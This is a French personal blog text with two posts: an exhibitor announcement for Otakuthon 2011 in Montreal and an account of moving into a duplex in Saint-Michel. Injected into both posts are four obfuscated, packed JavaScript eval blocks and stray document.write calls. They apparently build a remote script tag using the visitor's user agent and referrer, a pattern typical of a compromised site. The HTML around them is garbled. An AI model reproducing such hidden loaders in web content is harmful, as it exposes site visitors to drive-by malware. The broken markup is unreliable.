Otakuthon 2011

Comme par les années passées, document.write(“”); je serai à <a href="http://www.otakuthon.com/&quot; target="“new”""Otakuthon/a ce week-end (quoique cette fois ce n'est pas en tant qu'invité mais simplement comme exposant).br /
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bebbi|var|u0026u|referrer|infzb||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aasyz|var|u0026u|referrer|fysyy||js|php’.split(‘|’),0,{}))
br /
La convention a lieu du 12 au 14 août au Palais des Congrès de Montréal (situé au 201, avenue Viger ouest, près du métro Place d’Armes). Voyez le site d’a href=”
http://www.otakuthon.com/&#8221; target=”“new”””>Otakuthon pour plus de détails.

Je serai à la table #502 du Salon d’expositon (aussi connue comme la salle de vente), qui sera ouverte au public vendredi de 17:00 à 21:00, samedi de 10:00 à 19:00 et dimanche de 10:00 à 17:00.

Venez me recontrer pour discutter et jetez un coup d’oeil sur les aubaines incroyable que j’offre sur les dvds d’anime et les manga!

Cette année je n’ai qu’une seule table de vente, alors elle sera pas mal encombrée. J’y ferai moins la présentation du magazine (here.

Enfin de retour!

C’est pas que j’étais vraiment partis mais j’ai été pas mal occupé ces derniers cinq mois, document.write(“”); d’où ce long silence de ma part.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|beark|var|u0026u|referrer|brydb||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rzrdi|var|u0026u|referrer|ahezf||js|php’.split(‘|’),0,{}))

Si la recherche et l’achat d’une maison a été une expérience éprouvante, le déménagement, lui, s’est avéré une aventure plutôt horrible. C’est que j’ai pas mal de “stuff.” Quand j’ai fermé mon bureau en faveur d’un “home office” j’ai tout rapatrié dans mon sous-sol sans vraiment avoir le temps de faire le ménage. Quand mes parents ont vendu la maison familiale, j’ai tout rapatrié mes affaires dans le sous-sol toujours sans avoir le temps de faire le ménage… Le sous-sol était donc plutôt plein, avec beaucoup de choses qui auraient pu être jetées, recyclées, données ou même vendues. Pris dans l’engrenage du quotidien je n’ai pas fait le ménage nécessaire et j’ai manqué de temps. La plupart des places où j’avais prévu donner du matérial informatique ou des livres n’étaient pas capable de répondre à mes besoins dans des délais raisonable. Je me suis donc retrouvé à jeter tout ce que je pouvais et à empaqueter le reste en vue de faire un vrai ménage définitif une fois rendu dans notre nouvelle maison. Mais ça faisait pas mal de stock à mettre en boites… C’était vraiment décourageant.

Le déménagement comme tel a été tout aussi long et pénible. Ça c’est étiré sur deux jours et un total de quatorze heures. Ça ma coûté un bras mais les déménageurs ont été plutôt cool et professionels. Par contre l’aménagement des pièces s’est fait sans trop de problèmes. J’ai réussi à faire placer les meubles là où je les voulais avec les piles de boites correspondantes dans le milieu de chaque pièce. Tout s’est rangé assez vite sans que les pièces aient l’air trop chargées. Bon, ça a quand même pris quelques semaines avant que le rez-de-chaussez soit présentable et je n’ai toujours pas fini d’installer les rideaux et stores. J’ai bourré le garage avec tout le reste du “stuff” (paperasses, affaires du bureau, etc., toutes ces choses où il va me falloir faire le ménage). Pour le sous-sol, où j’ai installé la salle télé et mon bureau, ça a été un peu plus long à organiser.

Comme nous sommes déménagé dans un espace plus petit et que je ne voulais pas charger le rez-de-chaussée, j’ai tout mis le reste des affaires dans le garage — en particulier tout le matériel relatif au bureau. Le garage était donc plein au rebord au point que c’était difficile d’y circuler et qu’on manquait d’espace pour trier les boites. Même mon bureau, au sous-sol, a été pas mal encombré pour plusieurs semaines. La réorgansation de mon bureau a été toute une aventure en soi. Ayant pris près d’un mois de vacances pour m’occuper de la mise en boites, du déménagement et de l’aménagement, j’ai pris les bouchés double au travail par le suite et j’ai travaillé assez souvent des semaine de six jours. C’était fatiguant et ne me laissait pas beaucoup de temps pour m’occupé de l’aménagement de mon bureau au sous-sol et du ménage des boites dans le garage. Toutefois j’ai dû m’occuper précipitement de ces dernières lorsque le garage a été inondé à cause d’un problème d’écoulement d’eau dans la rue en face de chez moi. J’ai dû réaménagé les boites dans le garage afin qu’elles soient à bonne distance du plancher et les trier pour évaluer ce qui avait été endomager par l’eau. Finalement, après trois mois de plaintes à la ville, des travaux temporaires ont finalement été affectuées cette semaines. J’espère que cela va définitiement corriger le problème…

Enfin, je suis donc finalement installé dans mon petit duplex du quartier Saint-Michel, acheté en copropriété indivise avec ma soeur. Je travaille encore beaucoup et j’ai une fin d’été pas mal occupé (Otakuthon, le festival des films du monde, etc.). Tout cela m’a épuisé et il me semble que j’ai un peu de dificulté à récupérer (cela a occasioné de petits problèmes de santé) mais là ça semble aller mieux. J’ai aussi commencé à lire la série “A Song of Ice and Fire” de George R.R. Martin (qui a été superbement adapté par HBO à la télé). J’en suis au troisième volume (“A Storm of Sword”, qui fait suite à ”A Game of Thrones” et ”A Clash of Kings”). Ça me tiens occupé dans l’autobus et le métro, puis le soir avant de dormir. C’est tellement cool de lire sur mon iPad (quoique dans le métro je préfère lire sur le iPod, c’est moins encombrant). Je lis également “Dispatches from a Public Librarian” de Scott Douglas. Mais là, je me dis qu’il va aussi me falloir recommencer à écrire et à bloguer. Ça me manque beaucoup mais, entre le travail et les choses à faire sur la maison (aménagement et beaucoup de petits travaux de réparations et d’amélioration), c’est difficile de trouver le temps. Ce sont les premiers pas qui sont toujours les plus difficiles à faire. Alors, voici: c’est fait, mais il reste tant de choses que je voudrais dire… Enfin, vous verrez bien.